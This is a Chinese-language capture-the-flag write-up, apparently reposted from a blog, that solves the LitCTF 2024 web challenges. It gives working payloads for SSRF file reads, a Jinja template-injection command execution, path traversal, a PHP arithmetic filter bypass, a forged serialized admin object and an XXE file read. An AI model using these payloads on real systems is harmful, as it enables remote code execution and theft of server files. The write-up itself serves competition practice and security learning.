自学内容网 自学内容网

【Web】LitCTF 2024 题解(全)

目录

浏览器也能套娃?

一个....池子? 

高亮主题(划掉)背景查看器 

百万美元的诱惑

SAS - Serializing Authentication

exx


浏览器也能套娃?

随便试一试,一眼ssrf

 file:///flag直接读本地文件

一个....池子? 

{{7*7}}测出SSTI

随便找个payload打了

{{x.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('tac /f*').read()")}}

高亮主题(划掉)背景查看器 

一眼文件包含漏洞

../../../../flag

目录穿越拿到flag

 

百万美元的诱惑

?a[]=1&b[]=2&c=2025.a

过了php八股 

访问./dollar.php

参考ctfshow web57

【Web】CTFSHOW PHP命令执行刷题记录(全)_ctfweb解题 php-CSDN博客 

0=$(())

12=$((~$((-13))))

-13=$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))

12=$((~$(($((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))))))

 

SAS - Serializing Authentication

傻瓜题

<?php

class User {

    public $username;

    public $password;

}

$user=new User();
$user->username='admin';
$user->password='secure_password';
echo base64_encode(serialize($user));
?>

exx

以xml形式传数据,打xxe

 直接读文件

<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<user><username>&xxe;</username><password>admin</password></user>

 


原文地址:https://blog.csdn.net/uuzeray/article/details/140687504

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!